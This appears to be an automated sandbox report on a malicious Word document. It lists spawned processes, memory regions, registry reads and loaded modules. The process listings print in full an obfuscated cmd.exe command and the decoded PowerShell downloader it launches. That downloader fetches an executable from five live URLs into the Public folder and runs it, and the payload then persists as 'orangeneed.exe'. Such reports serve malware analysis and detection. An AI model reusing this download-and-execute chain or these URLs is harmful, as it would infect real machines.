bded6d7d...74b7

Monitored Processes

Process Overview

ID	PID	Monitor Reason	Integrity Level	Image Name	Command Line	Origin ID
#1	0x938	Analysis Target	Medium	winword.exe	"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n	-
#2	0xb44	Child Process	Medium	cmd.exe	cmd /V^:/C"^s^et z^q^j8=^ ^ ^ ^ ^ ^ ^}}{^hctac^};k^aerb^;jq^j$ ^me^t^I-^ekovnI;)^jqj^$^ ^,VT^O^$(e^liFdao^ln^w^oD^.VR^T^${^yrt{)pm^i^$ n^i VT^O$(^hca^er^of;'^ex^e.'^+FaR^$+^'^\^'+ci^lb^up^:vne$^=j^q^j$^;'8^24^'^ ^=^ ^FaR$^;)^'@^'(tilpS.'^6^XLE^B^d^b^EF^k/^moc^.se^i^g^ol^on^hc^etnavda//^:^p^tt^h^@^g59QLoG/au^.m^oc^.s^p^i^hc^do^o^w//^:p^tth@6Ur^grTZD/^tnetn^oc^-^p^w/ri^.ca^.umhs^.^udrc//:^p^t^th^@F^D^8vH^fL/^sd^a^o^lpu/tn^etnoc^-p^w/m^oc.^tesrocv^.w^w^w//:^p^t^th^@^0^gD^5^e1w^b/^tn^e^tnoc-p^w/di.c^a.gn^a^lam^-n^iu.^i^s^amra^f//^:^ptt^h'=^p^mi^$^;tn^e^i^lC^be^W.^teN^ ^tce^j^bo-wen^=VRT$^ l^l^e^h^sr^ewo^p&&^for /^L %^y ^in (4^26,-^1,^0)^do ^se^t 5^d^UZ=!5^d^UZ!!z^q^j8:~%^y,1!&&^i^f %^y ^l^s^s ^1 ca^l^l %5^d^UZ:^~^6%"	#1
#3	0xb64	Child Process	Medium	powershell.exe	powershell $TRV=new-object Net.WebClient;$imp='http://farmasi.uin-malang.ac.id/wp-content/bw1e5Dg0@http://www.vcorset.com/wp-content/uploads/LfHv8DF@http://crdu.shmu.ac.ir/wp-content/DZTrgrU6@http://woodchips.com.ua/GoLQ95g@http://advantechnologies.com/kFEbdBELX6'.Split('@');$RaF = '428';$jqj=$env:public+'\'+$RaF+'.exe';foreach($OTV in $imp){try{$TRV.DownloadFile($OTV, $jqj);Invoke-Item $jqj;break;}catch{}}	#2
#4	0x8d4	Child Process	Medium	428.exe	"C:\Users\Public\428.exe"	#3
#5	0x8d0	Child Process	Medium	428.exe	"C:\Users\Public\428.exe"	#4
#6	0x9cc	Child Process	Medium	orangeneed.exe	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe"	#5
#7	0x9dc	Child Process	Medium	orangeneed.exe	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe"	#6
#9	0x314	Child Process	Medium	orangeneed.exe	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe" /scomma "C:\Users\aETAdzjz\AppData\Local\Temp\72DE.tmp"	#7
#11	0x548	Autostart	Medium	orangeneed.exe	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe"	-
#12	0x5e0	Child Process	Medium	orangeneed.exe	"C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe"	#11

Behavior Information - Grouped by Category

Process #1: winword.exe

286

Information	Value
ID	#1
File Name	c:\program files\microsoft office\root\office16\winword.exe
Command Line	"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:00:52, Reason: Analysis Target
Unmonitor	End Time: 00:03:17, Reason: Self Terminated
Monitor Duration	00:02:25

OS Process Information

Information	Value
PID	0x938
Parent PID	0x45c (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 9E8 0x 9E0 0x 9B0 0x 9A8 0x 9A4 0x 9A0 0x 99C 0x 998 0x 994 0x 990 0x 98C 0x 988 0x 984 0x 980 0x 97C 0x 978 0x 958 0x 954 0x 94C 0x 948 0x 93C 0x B40 0x 818 0x C0

Region

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x00020fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00043fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rw	-
pagefile_0x00000000000e0000	0x000e0000	0x000e0fff	Pagefile Backed Memory	rw	-
private_0x00000000000f0000	0x000f0000	0x001effff	Private Memory	rw	-
private_0x00000000001f0000	0x001f0000	0x002effff	Private Memory	rw	-
pagefile_0x00000000002f0000	0x002f0000	0x002f6fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000300000	0x00300000	0x00301fff	Pagefile Backed Memory	rw	-
private_0x0000000000310000	0x00310000	0x00310fff	Private Memory	rw	-
private_0x0000000000320000	0x00320000	0x00320fff	Private Memory	rw	-
pagefile_0x0000000000330000	0x00330000	0x00331fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000340000	0x00340000	0x00341fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000350000	0x00350000	0x00352fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000360000	0x00360000	0x00361fff	Pagefile Backed Memory	r	-
private_0x0000000000370000	0x00370000	0x0037ffff	Private Memory	rw	-
private_0x0000000000380000	0x00380000	0x0038ffff	Private Memory	-	-
pagefile_0x0000000000390000	0x00390000	0x00392fff	Pagefile Backed Memory	r	-
pagefile_0x00000000003a0000	0x003a0000	0x003a2fff	Pagefile Backed Memory	r	-
pagefile_0x00000000003b0000	0x003b0000	0x003b2fff	Pagefile Backed Memory	r	-
pagefile_0x00000000003c0000	0x003c0000	0x003c2fff	Pagefile Backed Memory	r	-
pagefile_0x00000000003d0000	0x003d0000	0x003d2fff	Pagefile Backed Memory	r	-
private_0x00000000003e0000	0x003e0000	0x004dffff	Private Memory	rw	-
pagefile_0x00000000004e0000	0x004e0000	0x00667fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000670000	0x00670000	0x007f0fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000800000	0x00800000	0x01bfffff	Pagefile Backed Memory	r	-
sortdefault.nls	0x01c00000	0x01ecefff	Memory Mapped File	r	-
pagefile_0x0000000001ed0000	0x01ed0000	0x022c2fff	Pagefile Backed Memory	r	-
private_0x00000000022d0000	0x022d0000	0x023cffff	Private Memory	rw	-
private_0x00000000023d0000	0x023d0000	0x0240ffff	Private Memory	rw	-
kernelbase.dll.mui	0x02410000	0x024cffff	Memory Mapped File	rw	-
private_0x00000000024d0000	0x024d0000	0x024dffff	Private Memory	rw	-
private_0x00000000024e0000	0x024e0000	0x026dffff	Private Memory	rw	-
pagefile_0x00000000026e0000	0x026e0000	0x027befff	Pagefile Backed Memory	r	-
private_0x0000000002840000	0x02840000	0x02840fff	Private Memory	rw	-
pagefile_0x0000000002850000	0x02850000	0x02850fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000002860000	0x02860000	0x02864fff	Pagefile Backed Memory	rw	-
private_0x0000000002870000	0x02870000	0x028effff	Private Memory	rw	-
pagefile_0x0000000002a60000	0x02a60000	0x02a61fff	Pagefile Backed Memory	r	-
private_0x0000000002a70000	0x02a70000	0x02b6ffff	Private Memory	rw	-
index.dat	0x02b70000	0x02b7bfff	Memory Mapped File	rw	-
index.dat	0x02b80000	0x02b87fff	Memory Mapped File	rw	-
private_0x0000000002b90000	0x02b90000	0x02b9ffff	Private Memory	rw	-
index.dat	0x02ba0000	0x02baffff	Memory Mapped File	rw	-
private_0x0000000002bb0000	0x02bb0000	0x02c2ffff	Private Memory	rw	-
pagefile_0x0000000002c30000	0x02c30000	0x02c30fff	Pagefile Backed Memory	r	-
private_0x0000000002c40000	0x02c40000	0x02d3ffff	Private Memory	rw	-
pagefile_0x0000000002d40000	0x02d40000	0x02d40fff	Pagefile Backed Memory	r	-
pagefile_0x0000000002d50000	0x02d50000	0x02d50fff	Pagefile Backed Memory	r	-
pagefile_0x0000000002d60000	0x02d60000	0x02d60fff	Pagefile Backed Memory	r	-
private_0x0000000002d70000	0x02d70000	0x02d70fff	Private Memory	rw	-
private_0x0000000002d80000	0x02d80000	0x02d80fff	Private Memory	rw	-
pagefile_0x0000000002d90000	0x02d90000	0x02d91fff	Pagefile Backed Memory	rw	-
private_0x0000000002da0000	0x02da0000	0x02e9ffff	Private Memory	rw	-
pagefile_0x0000000002ea0000	0x02ea0000	0x02ea1fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000002eb0000	0x02eb0000	0x02eb1fff	Pagefile Backed Memory	r	-
msxml6r.dll	0x02ec0000	0x02ec0fff	Memory Mapped File	r	-
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db	0x02ed0000	0x02eeffff	Memory Mapped File	r	-
pagefile_0x0000000002ef0000	0x02ef0000	0x02ef0fff	Pagefile Backed Memory	rw	-
private_0x0000000002f00000	0x02f00000	0x02ffffff	Private Memory	rw	-
segoeui.ttf	0x03000000	0x0307efff	Memory Mapped File	r	-
pagefile_0x0000000003080000	0x03080000	0x03081fff	Pagefile Backed Memory	r	-
pagefile_0x0000000003090000	0x03090000	0x03090fff	Pagefile Backed Memory	r	-
private_0x00000000030a0000	0x030a0000	0x0319ffff	Private Memory	rw	-
pagefile_0x00000000031a0000	0x031a0000	0x0359ffff	Pagefile Backed Memory	r	-
private_0x00000000035a0000	0x035a0000	0x0369ffff	Private Memory	rw	-
private_0x00000000036b0000	0x036b0000	0x036b1fff	Private Memory	rw	-
private_0x00000000036c0000	0x036c0000	0x036c0fff	Private Memory	rw	-
c_1255.nls	0x036d0000	0x036e0fff	Memory Mapped File	r	-
private_0x0000000003740000	0x03740000	0x0374ffff	Private Memory	rw	-
private_0x00000000037c0000	0x037c0000	0x0383ffff	Private Memory	rwx	-
private_0x0000000003840000	0x03840000	0x0393ffff	Private Memory	rw	-
private_0x0000000003940000	0x03940000	0x03a3ffff	Private Memory	rw	-
private_0x0000000003a40000	0x03a40000	0x03e3ffff	Private Memory	rw	-
private_0x0000000003e40000	0x03e40000	0x03f3ffff	Private Memory	rw	-
private_0x0000000004080000	0x04080000	0x0417ffff	Private Memory	rw	-
private_0x0000000004210000	0x04210000	0x0430ffff	Private Memory	rw	-
pagefile_0x0000000004310000	0x04310000	0x04652fff	Pagefile Backed Memory	r	-
pagefile_0x0000000004660000	0x04660000	0x04e5ffff	Pagefile Backed Memory	rw	-
tahoma.ttf	0x04e60000	0x04f0afff	Memory Mapped File	r	-
private_0x0000000004f20000	0x04f20000	0x04f2ffff	Private Memory	rw	-
private_0x0000000004f60000	0x04f60000	0x04f6ffff	Private Memory	rw	-
private_0x0000000004f80000	0x04f80000	0x04ffffff	Private Memory	rw	-
private_0x0000000005000000	0x05000000	0x050fffff	Private Memory	rw	-
private_0x0000000005120000	0x05120000	0x0512ffff	Private Memory	rw	-
private_0x00000000051b0000	0x051b0000	0x052affff	Private Memory	rw	-
private_0x0000000005370000	0x05370000	0x0546ffff	Private Memory	rw	-
private_0x0000000005490000	0x05490000	0x0558ffff	Private Memory	rw	-
private_0x0000000005670000	0x05670000	0x0576ffff	Private Memory	rw	-
private_0x0000000005780000	0x05780000	0x057fffff	Private Memory	rw	-
private_0x0000000005840000	0x05840000	0x0593ffff	Private Memory	rw	-
private_0x00000000059a0000	0x059a0000	0x05a9ffff	Private Memory	rw	-
private_0x0000000005b20000	0x05b20000	0x05c1ffff	Private Memory	rw	-
private_0x0000000005c80000	0x05c80000	0x05d7ffff	Private Memory	rw	-
staticcache.dat	0x05d80000	0x066affff	Memory Mapped File	r	-
private_0x00000000066b0000	0x066b0000	0x06eaffff	Private Memory	rw	-
private_0x0000000006eb0000	0x06eb0000	0x06faffff	Private Memory	rw	-
pagefile_0x0000000006fb0000	0x06fb0000	0x07faffff	Pagefile Backed Memory	rw	-
private_0x0000000008040000	0x08040000	0x080bffff	Private Memory	rw	-
private_0x0000000008130000	0x08130000	0x0822ffff	Private Memory	rw	-
private_0x0000000008350000	0x08350000	0x083cffff	Private Memory	rw	-
private_0x00000000084d0000	0x084d0000	0x0854ffff	Private Memory	rw	-
private_0x0000000008550000	0x08550000	0x0894ffff	Private Memory	rw	-
private_0x0000000008950000	0x08950000	0x08d50fff	Private Memory	rw	-
private_0x0000000008d60000	0x08d60000	0x09160fff	Private Memory	rw	-
private_0x0000000009170000	0x09170000	0x09570fff	Private Memory	rw	-
private_0x0000000009580000	0x09580000	0x0977ffff	Private Memory	rw	-
private_0x0000000009780000	0x09780000	0x0a780fff	Private Memory	rw	-
private_0x000000000a790000	0x0a790000	0x0ab8ffff	Private Memory	rw	-
private_0x0000000037240000	0x37240000	0x3724ffff	Private Memory	rwx	-
private_0x0000000037490000	0x37490000	0x3749ffff	Private Memory	rwx	-
osppc.dll	0x749d0000	0x74a02fff	Memory Mapped File	rwx	-
user32.dll	0x77230000	0x77329fff	Memory Mapped File	rwx	-
kernel32.dll	0x77330000	0x7744efff	Memory Mapped File	rwx	-
ntdll.dll	0x77450000	0x775f8fff	Memory Mapped File	rwx	-
normaliz.dll	0x77610000	0x77612fff	Memory Mapped File	rwx	-
psapi.dll	0x77620000	0x77626fff	Memory Mapped File	rwx	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
winword.exe	0x13f5d0000	0x13f7abfff	Memory Mapped File	rwx	-
private_0x000007febd6b0000	0x7febd6b0000	0x7febd6bffff	Private Memory	rwx	-
private_0x000007febdad0000	0x7febdad0000	0x7febdadffff	Private Memory	rwx	-
ivy.dll	0x7fee3b20000	0x7fee3d74fff	Memory Mapped File	rwx	-
chart.dll	0x7fee3d80000	0x7fee4b55fff	Memory Mapped File	rwx	-
webservices.dll	0x7fee4b60000	0x7fee4c7efff	Memory Mapped File	rwx	-
msptls.dll	0x7fee4c80000	0x7fee4df3fff	Memory Mapped File	rwx	-
adal.dll	0x7fee4e00000	0x7fee4f19fff	Memory Mapped File	rwx	-
riched20.dll	0x7fee4f20000	0x7fee51bafff	Memory Mapped File	rwx	-
mscoreei.dll	0x7fee52f0000	0x7fee5388fff	Memory Mapped File	rwx	-
mscoree.dll	0x7fee5390000	0x7fee53fefff	Memory Mapped File	rwx	-
dwrite.dll	0x7fee5400000	0x7fee557dfff	Memory Mapped File	rwx	-
d3d10warp.dll	0x7fee5580000	0x7fee574ffff	Memory Mapped File	rwx	-
msointl.dll	0x7fee5750000	0x7fee58ecfff	Memory Mapped File	rwx	-
wwintl.dll	0x7fee58f0000	0x7fee59affff	Memory Mapped File	rwx	-
msores.dll	0x7fee59b0000	0x7fee9d96fff	Memory Mapped File	rwx	-
mso99lres.dll	0x7fee9da0000	0x7feeaa94fff	Memory Mapped File	rwx	-
mso40uires.dll	0x7feeaaa0000	0x7feeaedcfff	Memory Mapped File	rwx	-
d2d1.dll	0x7feeaee0000	0x7feeafc1fff	Memory Mapped File	rwx	-
mso.dll	0x7feeafd0000	0x7feec9fbfff	Memory Mapped File	rwx	-
mso98win32client.dll	0x7feeca00000	0x7feed6a6fff	Memory Mapped File	rwx	-
mso40uiwin32client.dll	0x7feed6b0000	0x7feee17efff	Memory Mapped File	rwx	-
mso30win32client.dll	0x7feee180000	0x7feee863fff	Memory Mapped File	rwx	-
mso20win32client.dll	0x7feee870000	0x7feeed12fff	Memory Mapped File	rwx	-
msvcp140.dll	0x7feeed20000	0x7feeedbbfff	Memory Mapped File	rwx	-
oart.dll	0x7feeedc0000	0x7feefd44fff	Memory Mapped File	rwx	-
d3d11.dll	0x7feefd50000	0x7feefe15fff	Memory Mapped File	rwx	-
For performance reasons, the remaining 258 entries are omitted. The remaining entries can be found in flog.txt.

Host Behavior

Registry (69)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\Licenses	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409	-	2	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9	-	2	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib	-	2	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0	-	2	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib	-	2	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0	-	2	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64	-	1	Fn
Open Key	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0	-	1	Fn
Read Value	HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7	data = }	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	value_name = RequireDeclaration, data = 189, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	value_name = CompileOnDemand, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	value_name = BackGroundCompile, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	value_name = BreakOnAllErrors, data = 255, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	value_name = BreakOnServerErrors, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64	data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB	2	Fn
Read Value	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64	data = C:\Windows\system32\stdole2.tlb	2	Fn
Read Value	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64	data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL	2	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	value_name = VbaCapability, data = 125	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	-	1	Fn
Enumerate Keys	HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	-	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	cmd /V^:/C"^s^et z^q^j8=^ ^ ^ ^ ^ ^ ^}}{^hctac^};k^aerb^;jq^j$ ^me^t^I-^ekovnI;)^jqj^$^ ^,VT^O^$(e^liFdao^ln^w^oD^.VR^T^${^yrt{)pm^i^$ n^i VT^O$(^hca^er^of;'^ex^e.'^+FaR^$+^'^\^'+ci^lb^up^:vne$^=j^q^j$^;'8^24^'^ ^=^ ^FaR$^;)^'@^'(tilpS.'^6^XLE^B^d^b^EF^k/^moc^.se^i^g^ol^on^hc^etnavda//^:^p^tt^h^@^g59QLoG/au^.m^oc^.s^p^i^hc^do^o^w//^:p^tth@6Ur^grTZD/^tnetn^oc^-^p^w/ri^.ca^.umhs^.^udrc//:^p^t^th^@F^D^8vH^fL/^sd^a^o^lpu/tn^etnoc^-p^w/m^oc.^tesrocv^.w^w^w//:^p^t^th^@^0^gD^5^e1w^b/^tn^e^tnoc-p^w/di.c^a.gn^a^lam^-n^iu.^i^s^amra^f//^:^ptt^h'=^p^mi^$^;tn^e^i^lC^be^W.^teN^ ^tce^j^bo-wen^=VRT$^ l^l^e^h^sr^ewo^p&&^for /^L %^y ^in (4^26,-^1,^0)^do ^se^t 5^d^UZ=!5^d^UZ!!z^q^j8:~%^y,1!&&^i^f %^y ^l^s^s ^1 ca^l^l %5^d^UZ:^~^6%"	os_pid = 0xb44, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE		1	Fn

Module (144)

Operation	Module	Additional Information	Count	Logfile
Load	Comctl32.dll	base_address = 0x7fefbc60000	1	Fn
Load	C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL	base_address = 0x7fee23f0000	1	Fn
Load	C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL	base_address = 0x7fee3570000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x7fefd8a0000	1	Fn
Load	VBE7.DLL	base_address = 0x7fee2bd0000	4	Fn
Get Handle	c:\program files\microsoft office\root\office16\winword.exe	base_address = 0x13f5d0000	1	Fn
Get Handle	MSI.DLL	base_address = 0x7fef97f0000	1	Fn
Get Handle	C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x77230000	1	Fn
Get Handle	oleaut32.dll	base_address = 0x7fefd8a0000	1	Fn
Get Filename	-	process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260	4	Fn
Get Address	Unknown module name	function = MsiProvideQualifiedComponentA, address_out = 0x7fef9873b3c	1	Fn
Get Address	Unknown module name	function = MsiGetProductCodeA, address_out = 0x7fef986a13c	1	Fn
Get Address	Unknown module name	function = MsiReinstallFeatureA, address_out = 0x7fef9871618	1	Fn
Get Address	Unknown module name	function = MsiProvideComponentA, address_out = 0x7fef986f088	1	Fn
Get Address	Unknown module name	function = MsoVBADigSigCallDlg, address_out = 0x7fee24f72c0	1	Fn
Get Address	Unknown module name	function = MsoVbaInitSecurity, address_out = 0x7fee24660b0	1	Fn
Get Address	Unknown module name	function = MsoFIEPolicyAndVersion, address_out = 0x7fee2411a60	1	Fn
Get Address	Unknown module name	function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee2465f50	1	Fn
Get Address	Unknown module name	function = MsoFInitOffice, address_out = 0x7fee240f000	1	Fn
Get Address	Unknown module name	function = MsoUninitOffice, address_out = 0x7fee23fe860	1	Fn
Get Address	Unknown module name	function = MsoFGetFontSettings, address_out = 0x7fee23f3fc0	1	Fn
Get Address	Unknown module name	function = MsoRgchToRgwch, address_out = 0x7fee2402380	1	Fn
Get Address	Unknown module name	function = MsoHrSimpleQueryInterface, address_out = 0x7fee23f7b80	1	Fn
Get Address	Unknown module name	function = MsoHrSimpleQueryInterface2, address_out = 0x7fee23f7b20	1	Fn
Get Address	Unknown module name	function = MsoFCreateControl, address_out = 0x7fee23f8730	1	Fn
Get Address	Unknown module name	function = MsoFLongLoad, address_out = 0x7fee2533260	1	Fn
Get Address	Unknown module name	function = MsoFLongSave, address_out = 0x7fee2533280	1	Fn
Get Address	Unknown module name	function = MsoFGetTooltips, address_out = 0x7fee2401f40	1	Fn
Get Address	Unknown module name	function = MsoFSetTooltips, address_out = 0x7fee2466370	1	Fn
Get Address	Unknown module name	function = MsoFLoadToolbarSet, address_out = 0x7fee2454590	1	Fn
Get Address	Unknown module name	function = MsoFCreateToolbarSet, address_out = 0x7fee23f55b0	1	Fn
Get Address	Unknown module name	function = MsoHpalOffice, address_out = 0x7fee2400240	1	Fn
Get Address	Unknown module name	function = MsoFWndProcNeeded, address_out = 0x7fee23f3d10	1	Fn
Get Address	Unknown module name	function = MsoFWndProc, address_out = 0x7fee23f6d30	1	Fn
Get Address	Unknown module name	function = MsoFCreateITFCHwnd, address_out = 0x7fee23f3d40	1	Fn
Get Address	Unknown module name	function = MsoDestroyITFC, address_out = 0x7fee23fe6f0	1	Fn
Get Address	Unknown module name	function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee23fdf40	1	Fn
Get Address	Unknown module name	function = MsoFGetComponentManager, address_out = 0x7fee23f7bf0	1	Fn
Get Address	Unknown module name	function = MsoMultiByteToWideChar, address_out = 0x7fee23ffcd0	1	Fn
Get Address	Unknown module name	function = MsoWideCharToMultiByte, address_out = 0x7fee23f8b20	1	Fn
Get Address	Unknown module name	function = MsoHrRegisterAll, address_out = 0x7fee24f2ef0	1	Fn
Get Address	Unknown module name	function = MsoFSetComponentManager, address_out = 0x7fee24042c0	1	Fn
Get Address	Unknown module name	function = MsoFCreateStdComponentManager, address_out = 0x7fee23f3e20	1	Fn
